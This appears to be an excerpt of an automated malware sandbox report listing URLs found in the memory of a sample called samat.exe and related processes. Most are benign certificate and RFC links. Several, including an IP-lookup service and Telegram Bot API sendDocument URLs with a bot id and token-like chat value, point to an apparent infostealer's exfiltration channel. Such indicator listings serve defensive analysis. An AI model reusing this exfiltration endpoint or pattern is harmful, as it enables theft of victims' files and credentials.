00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: samat.exe, 00000008.00000002.4561716513.000001BCCCB00000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
Source: svchost.exe, 00000019.00000002.6314363798.0000022FAD702000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://passport.net/tb
Source: samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563998531.000001BCCD441000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76
Source: samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561108918.000001BCCCA7C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCA76000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCA79000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559388808.000001BCCC857000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCA79000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529948916.000001BCCC84F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529095803.000001BCCC843000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCA78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc4880
Source: samat.exe, 00000008.00000002.4565677561.000001BCCDDBC000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565677561.000001BCCDDE4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5234
Source: samat.exe, 00000008.00000002.4565419860.000001BCCDB6C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5297
Source: samat.exe, 00000008.00000003.4534182312.000001BCCD3E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5869
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: samat.exe, 00000008.00000002.4565677561.000001BCCDDBC000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565677561.000001BCCDDE4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6455#section-5.2
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563798977.000001BCCD40E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550021328.000001BCCCAC9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4547576732.000001BCCCAB1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561290600.000001BCCCACD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526519071.000001BCCCAAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
Source: samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550021328.000001BCCCAC9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4547576732.000001BCCCAB1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561290600.000001BCCCACD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526519071.000001BCCCAAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crlD
Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm
Source: samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm2
Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es00
Source: samat.exe, 00000007.00000003.2997340150.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/
Source: samat.exe, 00000007.00000003.2999845052.00000209A4401000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2997340150.00000209A4400000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2997340150.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4564064125.000001BCCD44C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCC9FF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560683562.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4532754927.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4530993878.000001BCCD44A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527548212.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563798977.000001BCCD40E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: samat.exe, 00000008.00000002.4561716513.000001BCCCB00000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3020584454.000001BCCC37F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024391863.000001BCCC374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/
Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527808216.000001BCCC98D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/t
Source: samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563930588.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: samat.exe, 00000008.00000003.4519025828.000001BCCD377000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513874113.000001BCCC714000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4518791762.000001BCCC718000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4558325205.000001BCCC719000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514877809.000001BCCD360000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509940106.000001BCCC711000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: samat.exe, 00000008.00000003.3025267001.000001BCCC8ED000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC8ED000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4520994875.000001BCCC8D4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4510392887.000001BCCC8BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC8C4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: samat.exe, 00000008.00000003.4551443074.000001BCCCAC3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4547576732.000001BCCCAB1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526519071.000001BCCCAAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps
Source: samat.exe, 00000008.00000003.4520729290.000001BCCCAD5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563798977.000001BCCD40E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.rfc-editor.org/info/rfc7253
Source: samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
Source: samat.exe, 00000008.00000003.4523890696.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502168541.000001BCCC995000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wwwsearch.sf.net/):
Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard7
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.myip.com
Source: samat.exe, 00000008.00000002.4566260781.000001BCCDE80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.myip.com/
Source: samat.exe, 00000008.00000002.4566260781.000001BCCDE80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.myip.com/0
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: samat.exe, 00000008.00000002.4565677561.000001BCCDE58000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8095725853/sendDocument
Source: samat.exe, 00000008.00000002.4565419860.000001BCCDC34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8095725853/sendDocument?chat_id=7027613045%3AAAGX3rPO-1UHB195if6JIXakjYP
Source: samat.exe, 00000008.00000002.4565419860.000001BCCDC34000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot8095725853/senddocument?chat_id=7027613045%3aaagx3rpo-1uhb195if6jixakjyp
Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://blog.jaraco.com/skeleton
Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugs.python.org/issue44497.
Source: chrome.exe, 00000010.00000002.3224153425.000037F40001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
